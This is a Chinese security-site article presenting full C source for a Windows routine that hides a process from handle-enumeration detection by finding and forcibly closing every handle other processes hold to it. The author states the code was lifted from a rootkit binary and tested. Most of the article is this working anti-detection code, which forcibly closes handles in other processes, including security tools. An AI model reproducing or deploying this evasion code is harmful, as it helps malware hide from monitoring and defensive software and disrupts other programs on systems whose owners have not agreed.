抹掉所有进程中自己的句柄

安全 黑客攻防
之前听过一个检测进程的想法,就是暴力枚举所有进程中的handle,查找其中类型为PROCESS的. 此法也被炉子牛用于他的LzOpenProcess(). 下面我就写了一断代码来对抗这个方法,纯属小伎俩,牛牛们飘过~

抹掉所有进程中自己的句柄

之前听过一个检测进程的想法,就是暴力枚举所有进程中的handle,查找其中类型为PROCESS的.

此法也被炉子牛用于他的LzOpenProcess().

下面我就写了一断代码来对抗这个方法,纯属小伎俩,牛牛们飘过~

严格说,此段代码不算原创,是从某rootkit的bin中扒出来的,因此基本保留其原貌,经我修改测试,主要函数如下:
 

void CloseAllmyHandles() 
{ 
   
  HANDLE hCurProcess,hSouceProcessHandle,hTargetHandle; 
  HANDLE hMyProcess=INVALID_HANDLE_VALUE,hMyThread=INVALID_HANDLE_VALUE; 
  DWORD pid,nBufferLen=0x40000,nRetnLen=0; 
  DWORD HandleCnt,NumberOfHandles; 
  DWORD pMyProcessObject = 0,pMyThreadObject = 0,pObject; 
  CLIENT_ID myCid,tmpCid; 
  PVOID pBuffer = NULL; 
  NTSTATUS status; 
  OBJECT_ATTRIBUTES  ObjectAttributes; 
  myCid.UniqueProcess =(HANDLE)my_GetProcessId(); 
  myCid.UniqueThread=(HANDLE)my_GetThreadId(); 
  InitializeObjectAttributes( &ObjectAttributes, NULL, 0, NULL, NULL ); 
  ZwOpenProcess(&hMyProcess, PROCESS_ALL_ACCESS, &ObjectAttributes, &myCid); 
  ZwOpenThread(&hMyThread, PROCESS_ALL_ACCESS, &ObjectAttributes, &myCid); 
  printf("hMyProcess:0x%08x\n",hMyProcess); 
  printf("hMyThread :0x%08x\n",hMyThread); 
  hCurProcess = GetCurrentProcess(); 
  status=ZwAllocateVirtualMemory(hCurProcess, &pBuffer, 0, &nBufferLen, MEM_COMMIT,PAGE_READWRITE); 
  if (!NT_SUCCESS(status)) 
  { 
    printf("Alloc Memory failed.\n"); 
    return; 
  } 
  printf("Alloced Buffer:0x%08X\n",pBuffer); 
  ZwQuerySystemInformation(SystemHandleInformation, pBuffer, nBufferLen, &nRetnLen);// 16=SystemHandleInformation 
  printf("Searching handles...\n"); 
  HandleCnt=*(DWORD *)pBuffer; 
  printf("Handle Count:%d\n",HandleCnt); 
  if (HandleCnt>1) 
  { 
    NumberOfHandles=*(DWORD*)pBuffer; 
    pHandleInfo=(PSYSTEM_HANDLE_TABLE_ENTRY_INFO)((char*)pBuffer+sizeof(DWORD)); 
    do 
    {                                                 
      //printf("HandleValue:0x%08X\n",pHandleInfo->HandleValue); 
      if ( pHandleInfo->HandleValue==(USHORT)hMyThread ) 
    { 
        if (pHandleInfo->UniqueProcessId == (USHORT)myCid.UniqueProcess ) 
        { 
          pMyThreadObject = *(DWORD*)&(pHandleInfo->Object); 
          printf("Thread  finded\n"); 
        } 
      } 
      if (pHandleInfo->HandleValue==(USHORT)hMyProcess ) 
      { 
        if (pHandleInfo->UniqueProcessId == (USHORT)myCid.UniqueProcess) 
        { 
          pMyProcessObject =*(DWORD*)&(pHandleInfo->Object); 
          printf("Process finded\n"); 
        } 
      } 
      ++pHandleInfo; 
      --NumberOfHandles; 
     
    } 
    while ( NumberOfHandles ); 
  } 
  ZwClose(hMyThread); 
  ZwClose(hMyProcess); 
  printf("Found my object ok.\nBegin Search and Close...\n"); 
  NumberOfHandles=HandleCnt; 
  if (HandleCnt>=1 ) 
  { 
  pHandleInfo=(PSYSTEM_HANDLE_TABLE_ENTRY_INFO)((char*)pBuffer+sizeof(DWORD)); 
    do 
    { 
      pObject = *(DWORD*)&(pHandleInfo->Object); 
     
      if ( pMyProcessObject == pObject || pMyThreadObject == pObject ) 
      { 
        printf("Found Handle=0x%08X OwnerPID=%4d\n",pHandleInfo->HandleValue,pHandleInfo->UniqueProcessId); 
      tmpCid.UniqueProcess= (HANDLE)pHandleInfo->UniqueProcessId; 
      tmpCid.UniqueThread=0; 
      InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL ); 
      status=ZwOpenProcess(&hSouceProcessHandle, PROCESS_DUP_HANDLE, &ObjectAttributes, &tmpCid); 
        //PrintZwError("ZwOpenProcess",status); 
        if (!status) 
        { 
    status=ZwDuplicateObject( 
            hSouceProcessHandle, 
            (void*)pHandleInfo->HandleValue, 
            hCurProcess, 
            &hTargetHandle, 
            0, 
            0, 
                DUPLICATE_CLOSE_SOURCE); 

  if ( !status) 
          { 
            ZwClose(hTargetHandle); 
            printf("Handle closed!\n"); 
          } 
      //PrintZwError("ZwDuplicateObject",status); 
          ZwClose(hSouceProcessHandle); 
        } 
      } 
      ++pHandleInfo; 
      --NumberOfHandles; 
    } 
    while ( NumberOfHandles ); 
  } 
  ZwFreeVirtualMemory(hCurProcess, &pBuffer, &nBufferLen, MEM_RELEASE); 
}

【编辑推荐】

  1. 如何从异常系统进程检查企业网络安全
  2. 系统安全之利用操作系统自带命令杀毒
  3. 巧妙从进程中判断病毒木马
责任编辑:安泉 来源: 黑客防线
相关推荐

2011-03-07 17:52:51

2022-04-15 10:37:00

权限进程UAC

2011-01-26 13:26:32

Linux进程

2022-02-09 09:46:15

BRATA恶意程安卓

2021-10-26 10:42:49

NET进程托管

2023-07-03 07:27:41

进程线程Win32

2015-03-24 13:52:36

slay

2010-06-28 14:52:30

cron进程

2016-10-28 21:30:00

AndroidJava进程

2024-05-23 08:24:11

Android进程开发

2020-11-17 06:52:51

架构数据库存储

2020-09-07 07:00:09

AI 数据人工智能

2009-12-25 10:48:23

ps -aux

2010-03-31 14:36:50

Oracle进程结构

2021-10-14 07:42:25

苹果蓝牙Bug

2022-08-16 08:42:26

macOS苹果漏洞

2021-09-06 14:37:19

软件开发 技术

2022-06-30 07:45:29

搜索联合搜索索引

2016-10-17 14:09:34

原始数据大数据大数据交易

2023-02-13 11:26:03

符号链接Linux
点赞
收藏

51CTO技术栈公众号